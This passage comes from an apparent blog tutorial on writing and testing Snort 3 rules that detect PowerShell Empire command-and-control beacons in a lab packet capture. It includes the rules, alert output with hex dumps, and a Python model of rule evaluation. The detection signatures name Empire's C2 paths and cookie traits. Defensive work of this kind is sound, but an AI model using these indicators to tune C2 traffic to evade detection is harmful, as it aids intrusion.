<span style="color: white;"> reference: url, http://www.securitynik.com;</span>
<span style="color: white;"> sid:4000001;</span>
<span style="color: white;"> rev: 10;</span>
<span style="color: white;"><span> </span>)</span>
</pre></div>
</div><div><br /></div><div><div>Here is the alert produced when this rule is run against the pcap.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(root💀securitynik)-[~/packets]</span>
<span style="color: white;">└─# snort --pcap-list empire-full-session.pcap -A cmg --talos --pcap-show -k none -d -R local.rules -c snort.lua -q | more</span>
<span style="color: white;">Reading network traffic from "empire-full-session.pcap" with snaplen = 1518</span>
<span style="color: white;">11/20-13:03:59.632367 [**] [1:4000001:10] "POWERSHELL EMPIRE COMPROMISED HOST: GET request made for /news.php detected" [**] [Classification: Known malware command and control traffic] [Priority: 1]</span>
<span style="color: white;"> {TCP} 10.0.0.110:1650 -> 10.0.0.107:443</span>
<span style="color: white;">http_inspect.http_method[3]:</span>
<span style="color: white;">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -</span>
<span style="color: white;">47 45 54 GET</span>
<span style="color: white;">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -</span>
<span style="color: white;">http_inspect.http_version[8]:</span>
<span style="color: white;">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -</span>
<span style="color: white;">48 54 54 50 2F 31 2E 31 HTTP/1.1 </span>
<span style="color: white;">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -</span>
<span style="color: white;">http_inspect.http_uri[9]:</span>
<span style="color: white;">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -</span>
<span style="color: white;">2F 6E 65 77 73 2E 70 68 70 /news.ph p</span>
<span style="color: white;">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -</span>
<span style="color: white;">http_inspect.http_header[93]:</span>
<span style="color: white;">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -</span>
<span style="color: white;">55 73 65 72 2D 41 67 65 6E 74 3A 20 73 65 63 75 User-Age nt: secu</span>
<span style="color: white;">72 69 74 79 6E 69 6B 2D 6C 61 75 6E 63 68 65 72 ritynik- launcher</span>
<span style="color: white;">2D 62 61 74 2D 55 73 65 72 2D 41 67 65 6E 74 0D -bat-Use r-Agent.</span>
<span style="color: white;">0A 48 6F 73 74 3A 20 31 30 2E 30 2E 30 2E 31 30 .Host: 1 0.0.0.10</span>
<span style="color: white;">37 3A 34 34 33 0D 0A 43 6F 6E 6E 65 63 74 69 6F 7:443..C onnectio</span>
<span style="color: white;">6E 3A 20 4B 65 65 70 2D 41 6C 69 76 65 n: Keep- Alive</span>
<span style="color: white;">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -</span>
<span style="color: white;">http_inspect.http_cookie[61]:</span>
<span style="color: white;">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -</span>
<span style="color: white;">53 65 63 75 72 69 74 79 4E 69 6B 2D 48 54 54 50 Security Nik-HTTP</span>
<span style="color: white;">2D 4C 69 73 74 65 6E 65 72 2D 43 6F 6F 6B 69 65 -Listene r-Cookie</span>
<span style="color: white;">3D 5A 4F 6B 4D 77 38 59 6A 6B 57 32 34 4C 30 41 =ZOkMw8Y jkW24L0A</span>
<span style="color: white;">78 61 63 49 4C 65 38 65 72 4C 38 73 3D xacILe8e rL8s=</span>
<span style="color: white;">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -</span>
</pre></div>
</div><div><br /></div><div>Good stuff. Now looking at the rule profile summary.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">rule profile (all, sorted by total_time)</span>
<span style="color: white;"># gid sid rev checks matches alerts time (us) avg/check avg/match avg/non-match timeouts suspends</span>
<span style="color: white;">= === === === ====== ======= ====== ========= ========= ========= ============= ======== ========</span>
<span style="color: white;">1 1 4000001 10 12 3 3 556 46 145 13 0 0</span>
</pre></div>
</div><div><br /></div><div><div>We made progress there. Moving to the second rule within the <i>local.rules</i> file, looking for the POST. I will copy most of the content above while making this into a service rule. Additionally, I will look for data at 420 bytes within the body of the HTTP message.</div><div><br /></div></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">alert http</span>
<span style="color: white;"><span> </span>(</span>
<span style="color: white;"> rem: "This rule is looking for Powershell Empire /news.php, hence the 'msg' option";</span>
<span style="color: white;"> msg: "POWERSHELL EMPIRE COMPROMISED HOST: POST request made for /news.php detected";</span>
<span style="color: white;"> </span>
<span style="color: white;"> rem: "Looking for HTTP method POST. Using the Hex values instead of the string in the first 3 bytes of the payload";</span>
<span style="color: white;"> http_method; </span>
<span style="color: white;"> content: "|50 4F 53 54|", offset 0, depth 4;</span>
<span style="color: white;"> </span>
<span style="color: white;"><span> </span><span> </span>rem: "find the string /news.php in the path. ";</span>
<span style="color: white;"> http_uri: path;</span>
<span style="color: white;"> content: "/news.php", distance 0, within 9, nocase; </span>
<span style="color: white;"> </span>
<span style="color: white;"> rem: "Looking for HTTP Version 1.1";</span>
<span style="color: white;"> http_version: request;</span>
<span style="color: white;"> content: "1.1";</span>
<span style="color: white;"> </span>
<span style="color: white;"> rem: "Looking for content greater than 400 bytes in the body of the message";</span>
<span style="color: white;"> http_client_body; </span>
<span style="color: white;"> isdataat: 420, relative;</span>
<span style="color: white;"> </span>
<span style="color: white;"> classtype: malware-cnc; </span>
<span style="color: white;"> reference: url, http://www.securitynik.com;</span>
<span style="color: white;"> sid:4000002;</span>
<span style="color: white;"> rev: 10;</span>
<span style="color: white;"><span> </span>)</span>
</pre></div>
</div><div><br /></div><div>When executed, here is what I see.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(root💀securitynik)-[~/packets]</span>
<span style="color: white;">└─# snort --pcap-list empire-full-session.pcap -A cmg --talos --pcap-show -k none -d -R local.rules -c snort.lua -q | more </span>
<span style="color: white;">Reading network traffic from "empire-full-session.pcap" with snaplen = 1518</span>
<span style="color: white;">11/20-13:04:02.701119 [**] [1:4000002:10] "POWERSHELL EMPIRE COMPROMISED HOST: POST request made for /news.php detected" [**] [Classification: Known malware command and control traffic] [Priority: 1</span>
<span style="color: white;">] {TCP} 10.0.0.110:1650 -> 10.0.0.107:443</span>
<span style="color: white;">http_inspect.http_method[4]:</span>
<span style="color: white;">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -</span>
<span style="color: white;">50 4F 53 54 POST</span>
<span style="color: white;">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -</span>
<span style="color: white;">http_inspect.http_version[8]:</span>
<span style="color: white;">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -</span>
<span style="color: white;">48 54 54 50 2F 31 2E 31 HTTP/1.1 </span>
<span style="color: white;">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -</span>
<span style="color: white;">http_inspect.http_uri[9]:</span>
<span style="color: white;">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -</span>
<span style="color: white;">2F 6E 65 77 73 2E 70 68 70 /news.ph p</span>
<span style="color: white;">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -</span>
<span style="color: white;">http_inspect.http_header[90]:</span>
<span style="color: white;">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -</span>
<span style="color: white;">55 73 65 72 2D 41 67 65 6E 74 3A 20 73 65 63 75 User-Age nt: secu</span>
<span style="color: white;">72 69 74 79 6E 69 6B 2D 6C 61 75 6E 63 68 65 72 ritynik- launcher</span>
<span style="color: white;">2D 62 61 74 2D 55 73 65 72 2D 41 67 65 6E 74 0D -bat-Use r-Agent.</span>
<span style="color: white;">0A 48 6F 73 74 3A 20 31 30 2E 30 2E 30 2E 31 30 .Host: 1 0.0.0.10</span>
<span style="color: white;">37 3A 34 34 33 0D 0A 43 6F 6E 74 65 6E 74 2D 4C 7:443..C ontent-L</span>
<span style="color: white;">65 6E 67 74 68 3A 20 34 36 32 ength: 4 62</span>
<span style="color: white;">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -</span>
<span style="color: white;">http_inspect.http_client_body[462]:</span>
<span style="color: white;">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -</span>
<span style="color: white;">8B 8D 84 5C 4A D7 63 63 B5 F8 11 9C 17 CE 19 A2 ...\J.cc ........</span>
<span style="color: white;">4C 6F F2 79 7F CE BD 41 A3 F3 D5 DC AD BA AF 00 Lo.y...A ........</span>
<span style="color: white;">C1 CC 4E 71 AC C9 7D 56 D0 E7 CF 67 28 B8 62 0D ..Nq..}V ...g(.b.</span>
<span style="color: white;">C2 3C 58 E7 38 68 84 38 7A C9 B7 0A 11 A8 1A FB .<X.8h.8 z.......</span>
<span style="color: white;">09 54 56 8E 4C 5F C8 6B 40 87 D2 94 4D C0 8E 76 .TV.L_.k @...M..v</span>
<span style="color: white;">86 4C B0 7D E0 AD 56 70 0E 69 D4 4F 34 07 62 EE .L.}..Vp .i.O4.b.</span>
<span style="color: white;">D2 0B F4 30 BF 56 8F EA 1A 66 2E 77 9D BB 49 1F ...0.V.. .f.w..I.</span>
<span style="color: white;">C0 1E AF 58 04 06 91 BD 34 4C 01 37 6E EC C1 2B ...X.... 4L.7n..+</span>
<span style="color: white;">CF 57 D3 9B 19 99 16 96 65 6C 09 8E 85 CD 5A B6 .W...... el....Z.</span>
<span style="color: white;">0B BE E7 36 38 9B DB 4B 7F B4 00 7C B9 D8 B8 38 ...68..K ...|...8</span>
<span style="color: white;">1E DA 91 C6 33 8C B7 29 7B A3 F9 79 33 A2 DE BB ....3..) {..y3...</span>
<span style="color: white;">D5 AB 22 3E F3 9D 8E FA 47 CE E2 E0 BF 70 90 89 ..">.... G....p..</span>
<span style="color: white;">E4 1D B8 62 A2 2C F6 DB C1 90 3A 3C 78 59 4B 54 ...b.,.. ..:<xYKT</span>
<span style="color: white;">47 9B EC 15 9C CA C8 D8 C1 98 A8 37 7C 24 38 59 G....... ...7|$8Y</span>
<span style="color: white;">E7 27 71 AC BC 87 A1 1F E4 00 96 F6 4C 90 3D 25 .'q..... ....L.=%</span>
<span style="color: white;">78 85 75 11 80 00 A1 AC 03 3C 4D 9D 09 75 8A 46 x.u..... .<M..u.F</span>
<span style="color: white;">B8 54 85 86 2F D0 99 C8 F9 7A 5D 50 6F 61 D7 A7 .T../... .z]Poa..</span>
<span style="color: white;">06 FF F6 70 9F AB 57 2C A1 BD CA B4 4F 10 B7 D1 ...p..W, ....O...</span>
<span style="color: white;">E5 E6 F4 F1 63 C9 6D 6C F5 41 8F 31 3F 3B 90 3E ....c.ml .A.1?;.></span>
<span style="color: white;">31 EE CA 64 2C 43 50 44 03 A3 51 2D 06 FD 74 49 1..d,CPD ..Q-..tI</span>
<span style="color: white;">A4 68 12 10 4D FF 2E EB 36 3B 1A C7 D2 D9 B1 09 .h..M... 6;......</span>
<span style="color: white;">60 07 30 BB 05 BC 11 B2 3A CB E1 7A 0E F9 72 F6 `.0..... :..z..r.</span>
<span style="color: white;">68 58 E4 B9 64 EB B4 D7 90 0D BD D9 72 A6 D1 A0 hX..d... ....r...</span>
<span style="color: white;">89 99 2D 15 8A A8 04 CB 7D 50 90 3B 4B AC 6F 41 ..-..... }P.;K.oA</span>
<span style="color: white;">--More--</span>
</pre></div>
</div><div><br /></div><div><div>Going back to non-service rules, this one looks for <i>/admin/get.php</i>.</div><div><br /></div><div>Here is the rule.</div><div><br /></div></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">alert tcp $HOME_NET any -> $EXTERNAL_NET 443</span>
<span style="color: white;"><span> </span>(</span>
<span style="color: white;"> rem: "This rule is looking for Powershell Empire /admin/get.php, hence the 'msg' option";</span>
<span style="color: white;"> msg: "POWERSHELL EMPIRE COMPROMISED HOST: GET request made for /admin/get.php detected";</span>
<span style="color: white;"> </span>
<span style="color: white;"> rem: "Looking for HTTP method GET. Using the Hex values instead of the string in the first 3 bytes of the payload";</span>
<span style="color: white;"> http_method; </span>
<span style="color: white;"> content: "|47 45 54|", offset 0, depth 3;</span>
<span style="color: white;"> </span>
<span style="color: white;"> rem: "find the string /admin/get.php in the path. ";</span>
<span style="color: white;"> http_uri: path;</span>
<span style="color: white;"> content: "/admin/get.php", distance 0, within 14, nocase; </span>
<span style="color: white;"> </span>
<span style="color: white;"> rem: "Looking for HTTP Version 1.1";</span>
<span style="color: white;"> http_version: request;</span>
<span style="color: white;"> content: "1.1";</span>
<span style="color: white;"> </span>
<span style="color: white;"> rem: "Also look for a cookie that ends with '=', suggesting base64 encoded content";</span>
<span style="color: white;"> http_header: field Cookie;</span>
<span style="color: white;"> regex: "/.*=$/i";</span>
<span style="color: white;"> </span>
<span style="color: white;"> classtype: malware-cnc; </span>
<span style="color: white;"> reference: url, http://www.securitynik.com;</span>
<span style="color: white;"> sid:4000003;</span>
<span style="color: white;"> rev: 10;</span>
<span style="color: white;"><span> </span>)</span>
</pre></div>
</div><div><br /></div><div><div>Here is the result from that rule.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(root💀securitynik)-[~/packets]</span>
<span style="color: white;">└─# snort --pcap-list empire-full-session.pcap -A cmg --talos --pcap-show -k none -d -R local.rules -c snort.lua -q | more </span>
<span style="color: white;">Reading network traffic from "empire-full-session.pcap" with snaplen = 1518</span>
<span style="color: white;">11/20-13:05:06.697538 [**] [1:4000003:10] "POWERSHELL EMPIRE COMPROMISED HOST: GET request made for /admin/get.php detected" [**] [Classification: Known malware command and control traffic] [Priority</span>
<span style="color: white;">: 1] {TCP} 10.0.0.110:1650 -> 10.0.0.107:443</span>
<span style="color: white;">http_inspect.http_method[3]:</span>
<span style="color: white;">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -</span>
<span style="color: white;">47 45 54 GET</span>
<span style="color: white;">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -</span>
<span style="color: white;">http_inspect.http_version[8]:</span>
<span style="color: white;">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -</span>
<span style="color: white;">48 54 54 50 2F 31 2E 31 HTTP/1.1 </span>
<span style="color: white;">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -</span>
<span style="color: white;">http_inspect.http_uri[14]:</span>
<span style="color: white;">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -</span>
<span style="color: white;">2F 61 64 6D 69 6E 2F 67 65 74 2E 70 68 70 /admin/g et.php</span>
<span style="color: white;">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -</span>
<span style="color: white;">http_inspect.http_header[102]:</span>
<span style="color: white;">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -</span>
<span style="color: white;">55 73 65 72 2D 41 67 65 6E 74 3A 20 4D 6F 7A 69 User-Age nt: Mozi</span>
<span style="color: white;">6C 6C 61 2F 35 2E 30 20 28 57 69 6E 64 6F 77 73 lla/5.0 (Windows</span>
<span style="color: white;">20 4E 54 20 36 2E 31 3B 20 57 4F 57 36 34 3B 20 NT 6.1; WOW64; </span>
<span style="color: white;">54 72 69 64 65 6E 74 2F 37 2E 30 3B 20 72 76 3A Trident/ 7.0; rv:</span>
<span style="color: white;">31 31 2E 30 29 20 6C 69 6B 65 20 47 65 63 6B 6F 11.0) li ke Gecko</span>
<span style="color: white;">0D 0A 48 6F 73 74 3A 20 31 30 2E 30 2E 30 2E 31 ..Host: 10.0.0.1</span>
<span style="color: white;">30 37 3A 34 34 33 07:443</span>
<span style="color: white;">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -</span>
<span style="color: white;">http_inspect.http_cookie[36]:</span>
<span style="color: white;">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -</span>
<span style="color: white;">73 65 73 73 69 6F 6E 3D 44 72 70 30 53 78 70 6B session= Drp0Sxpk</span>
<span style="color: white;">54 54 4A 32 62 4B 71 57 30 7A 7A 50 55 56 56 31 TTJ2bKqW 0zzPUVV1</span>
<span style="color: white;">67 32 59 3D g2Y=</span>
<span style="color: white;">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -</span>
</pre></div>
</div><div><br /></div><div><div>... and the final rule, looking for <i>/login/process.php</i>.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">alert tcp $HOME_NET any -> $EXTERNAL_NET 443</span>
<span style="color: white;"><span> </span>(</span>
<span style="color: white;"> rem: "This rule is looking for Powershell Empire /login/process.php, hence the 'msg' option";</span>
<span style="color: white;"> msg: "POWERSHELL EMPIRE COMPROMISED HOST: GET request made for /login/process.php detected";</span>
<span style="color: white;"> </span>
<span style="color: white;"> rem: "Looking for HTTP method GET. Using the Hex values instead of the string in the first 3 bytes of the payload";</span>
<span style="color: white;"> http_method; </span>
<span style="color: white;"> content: "|47 45 54|", offset 0, depth 3;</span>
<span style="color: white;"> </span>
<span style="color: white;"> rem: "find the string /login/process.php in the path. ";</span>
<span style="color: white;"> http_uri: path;</span>
<span style="color: white;"> content: "/login/process.php", distance 0, within 18, nocase; </span>
<span style="color: white;"> </span>
<span style="color: white;"> rem: "Looking for HTTP Version 1.1";</span>
<span style="color: white;"> http_version: request;</span>
<span style="color: white;"> content: "1.1";</span>
<span style="color: white;"> </span>
<span style="color: white;"> rem: "Also look for a cookie that ends with '=', suggesting base64 encoded content";</span>
<span style="color: white;"> http_header: field Cookie;</span>
<span style="color: white;"> content: "session", nocase;</span>
<span style="color: white;"> regex: "/^session.*=$/i";</span>
<span style="color: white;"> </span>
<span style="color: white;"> classtype: malware-cnc; </span>
<span style="color: white;"> reference: url, http://www.securitynik.com;</span>
<span style="color: white;"> sid:4000004;</span>
<span style="color: white;"> rev: 10;</span>
<span style="color: white;"><span> </span>)</span>
</pre></div>
</div><div><br /></div><div><div>Here is what the results look like when snort is run against the pcap.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(root💀securitynik)-[~/packets]</span>
<span style="color: white;">└─# snort --pcap-list empire-full-session.pcap -A cmg --talos --pcap-show -k none -d -R local.rules -c snort.lua -q | more</span>
<span style="color: white;">Reading network traffic from "empire-full-session.pcap" with snaplen = 1518</span>
<span style="color: white;">11/20-13:06:06.836488 [**] [1:4000004:10] "POWERSHELL EMPIRE COMPROMISED HOST: GET request made for /login/process.php detected" [**] [Classification: Known malware command and control traffic] [Prio</span>
<span style="color: white;">rity: 1] {TCP} 10.0.0.110:1650 -> 10.0.0.107:443</span>
<span style="color: white;">http_inspect.http_method[3]:</span>
<span style="color: white;">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -</span>
<span style="color: white;">47 45 54 GET</span>
<span style="color: white;">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -</span>
<span style="color: white;">http_inspect.http_version[8]:</span>
<span style="color: white;">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -</span>
<span style="color: white;">48 54 54 50 2F 31 2E 31 HTTP/1.1 </span>
<span style="color: white;">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -</span>
<span style="color: white;">http_inspect.http_uri[18]:</span>
<span style="color: white;">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -</span>
<span style="color: white;">2F 6C 6F 67 69 6E 2F 70 72 6F 63 65 73 73 2E 70 /login/p rocess.p</span>
<span style="color: white;">68 70 hp</span>
<span style="color: white;">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -</span>
<span style="color: white;">http_inspect.http_header[102]:</span>
<span style="color: white;">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -</span>
<span style="color: white;">55 73 65 72 2D 41 67 65 6E 74 3A 20 4D 6F 7A 69 User-Age nt: Mozi</span>
<span style="color: white;">6C 6C 61 2F 35 2E 30 20 28 57 69 6E 64 6F 77 73 lla/5.0 (Windows</span>
<span style="color: white;">20 4E 54 20 36 2E 31 3B 20 57 4F 57 36 34 3B 20 NT 6.1; WOW64; </span>
<span style="color: white;">54 72 69 64 65 6E 74 2F 37 2E 30 3B 20 72 76 3A Trident/ 7.0; rv:</span>
<span style="color: white;">31 31 2E 30 29 20 6C 69 6B 65 20 47 65 63 6B 6F 11.0) li ke Gecko</span>
<span style="color: white;">0D 0A 48 6F 73 74 3A 20 31 30 2E 30 2E 30 2E 31 ..Host: 10.0.0.1</span>
<span style="color: white;">30 37 3A 34 34 33 07:443</span>
<span style="color: white;">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -</span>
<span style="color: white;">http_inspect.http_cookie[36]:</span>
<span style="color: white;">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -</span>
<span style="color: white;">73 65 73 73 69 6F 6E 3D 72 2B 57 77 61 4F 42 61 session= r+WwaOBa</span>
<span style="color: white;">55 4C 50 37 6C 34 37 4B 72 64 68 55 30 41 42 4C ULP7l47K rdhU0ABL</span>
<span style="color: white;">36 49 30 3D 6I0=</span>
<span style="color: white;">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -</span>
</pre></div>
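<div><br /></div><div>To make the buffer and cursor behaviour these rules depend on concrete, here is an added Python model, written for this write-up rather than taken from Snort or from the rules themselves. It parses a raw request into the http_inspect buffers the rules name and applies content with offset/depth, content with distance/within, isdataat relative and regex the way the three rules above use them; the sample requests are constructed, with paths and cookie values mirroring the outputs above.</div>

```python
"""Added example, not Snort's code: a Python model of how Snort 3 evaluates
the local.rules entries above. Each http_* option selects a buffer and resets
the cursor; content/isdataat/regex then run against that buffer and cursor."""
import re
from collections import namedtuple

# The subset of http_inspect buffers referenced by the rules.
Buffers = namedtuple("Buffers", "method uri_path version cookie client_body")

def parse_request(raw: bytes) -> Buffers:
    """Split a raw request; 'http_uri: path' is the target minus any query."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    method, target, version = lines[0].split(b" ", 2)
    cookie = b""
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        if name.strip().lower() == b"cookie":   # http_header: field Cookie
            cookie = value.strip()
    return Buffers(method, target.split(b"?", 1)[0], version, cookie, body)

class Detector:
    """Tracks the active buffer and the cursor like the detection engine."""

    def __init__(self):
        self.buf, self.cursor = b"", 0

    def use(self, buf: bytes):
        """http_method; http_uri: path; etc.: new buffer, cursor back to 0."""
        self.buf, self.cursor = buf, 0
        return self

    def content(self, needle, offset=None, depth=None, distance=None,
                within=None, nocase=False):
        """offset/depth count from the buffer start, distance/within from the
        cursor; a hit moves the cursor to the end of the match."""
        if distance is not None or within is not None:
            start, span = self.cursor + (distance or 0), within
        else:
            start, span = offset or 0, depth
        end = start + span if span is not None else len(self.buf)
        hay, pat = self.buf[start:end], needle
        if nocase:
            hay, pat = hay.lower(), pat.lower()
        idx = hay.find(pat)
        if idx < 0:
            return False
        self.cursor = start + idx + len(pat)
        return True

    def isdataat(self, n, relative=False):
        """Byte n exists (from the cursor if relative): 420 on a fresh body buffer means body > 420 bytes."""
        base = self.cursor if relative else 0
        return len(self.buf) > base + n

    def regex(self, pattern, flags=0):
        """regex is not cursor-relative unless flagged: whole active buffer."""
        return re.search(pattern, self.buf, flags) is not None

def _request_line(d, b, method, path):
    """Shared prefix of the rules: method at offset 0, path, HTTP version."""
    return (d.use(b.method).content(method, offset=0, depth=len(method))
            and d.use(b.uri_path).content(path, distance=0, within=len(path), nocase=True)
            and d.use(b.version).content(b"1.1"))

def rule_4000002(b):  # POST /news.php with a body longer than 420 bytes
    d = Detector()
    return (_request_line(d, b, b"POST", b"/news.php")
            and d.use(b.client_body).isdataat(420, relative=True))

def rule_4000003(b):  # GET /admin/get.php with a Cookie ending in '='
    d = Detector()
    return (_request_line(d, b, b"GET", b"/admin/get.php")
            and d.use(b.cookie).regex(rb".*=$", re.I))

def rule_4000004(b):  # GET /login/process.php with a 'session...=' Cookie
    d = Detector()
    return (_request_line(d, b, b"GET", b"/login/process.php")
            and d.use(b.cookie).content(b"session", nocase=True)
            and d.regex(rb"^session.*=$", re.I))

RULES = {4000002: rule_4000002, 4000003: rule_4000003, 4000004: rule_4000004}

def matching_sids(raw: bytes) -> list:
    """Return the sids of the rules that would alert on one request."""
    return [sid for sid, fn in RULES.items() if fn(parse_request(raw))]

# Constructed requests (not pcap packets); paths and cookies mirror the post.
SAMPLES = {
    "post_news": b"POST /news.php HTTP/1.1\r\nHost: 10.0.0.107:443\r\n\r\n" + b"\x8b" * 462,
    "short_post": b"POST /news.php HTTP/1.1\r\nHost: 10.0.0.107:443\r\n\r\n" + b"A" * 100,
    "get_admin": b"GET /admin/get.php HTTP/1.1\r\nCookie: session=Drp0SxpkTTJ2bKqW0zzPUVV1g2Y=\r\n\r\n",
    "get_login": b"GET /login/process.php HTTP/1.1\r\nCookie: session=r+WwaOBaULP7l47KrdhU0ABL6I0=\r\n\r\n",
    "benign": b"GET /index.html HTTP/1.1\r\nHost: www.example.com\r\nCookie: theme=dark\r\n\r\n",
}
```

The short_post sample shows the isdataat check doing its job: same method and path as the real beacon, but a 100-byte body does not reach byte 420, so sid 4000002 stays silent.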
</div><div><br /></div><div><div>OK, good stuff. With all of those in place, we can conclude that we are good to go with this detection. Now let's take a few different looks at the outputs.</div><div><br /></div><div>First up, <i>JSON</i> format.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(root💀securitynik)-[~/packets]</span>
<span style="color: white;">└─# snort --pcap-list empire-full-session.pcap -A alert_json --talos --pcap-show -k none -d -R local.rules -c snort.lua -q | more </span>
<span style="color: white;">Reading network traffic from "empire-full-session.pcap" with snaplen = 1518</span>
<span style="color: white;">{ "timestamp" : "11/20-13:03:59.632367", "pkt_num" : 9, "proto" : "TCP", "pkt_gen" : "stream_tcp", "pkt_len" : 164, "dir" : "C2S", "src_ap" : "10.0.0.110:1650", "dst_ap" : "10.0.0.107:443", "rule" : </span>
<span style="color: white;">"1:4000001:10", "action" : "allow" }</span>
<span style="color: white;">{ "timestamp" : "11/20-13:04:02.701119", "pkt_num" : 18, "proto" : "TCP", "pkt_gen" : "stream_tcp", "pkt_len" : 462, "dir" : "C2S", "src_ap" : "10.0.0.110:1650", "dst_ap" : "10.0.0.107:443", "rule" :</span>
<span style="color: white;"> "1:4000002:10", "action" : "allow" }</span>
<span style="color: white;">{ "timestamp" : "11/20-13:05:06.697538", "pkt_num" : 51, "proto" : "TCP", "pkt_gen" : "stream_tcp", "pkt_len" : 148, "dir" : "C2S", "src_ap" : "10.0.0.110:1650", "dst_ap" : "10.0.0.107:443", "rule" :</span>
<span style="color: white;"> "1:4000003:10", "action" : "allow" }</span>
<span style="color: white;">{ "timestamp" : "11/20-13:06:06.836488", "pkt_num" : 58, "proto" : "TCP", "pkt_gen" : "stream_tcp", "pkt_len" : 148, "dir" : "C2S", "src_ap" : "10.0.0.110:1650", "dst_ap" : "10.0.0.107:443", "rule" :</span>
<span style="color: white;"> "1:4000004:10", "action" : "allow" }</span>
<span style="color: white;">...</span>
</pre></div>
</div><div><br /></div><div>Looking at <i>alert_full</i> (the command below uses <i>-A alert_full</i>):</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(root💀securitynik)-[~/packets]</span>
<span style="color: white;">└─# snort --pcap-list empire-full-session.pcap -A alert_full --talos --pcap-show -k none -d -R local.rules -c snort.lua -q | more</span>
<span style="color: white;">Reading network traffic from "empire-full-session.pcap" with snaplen = 1518</span>
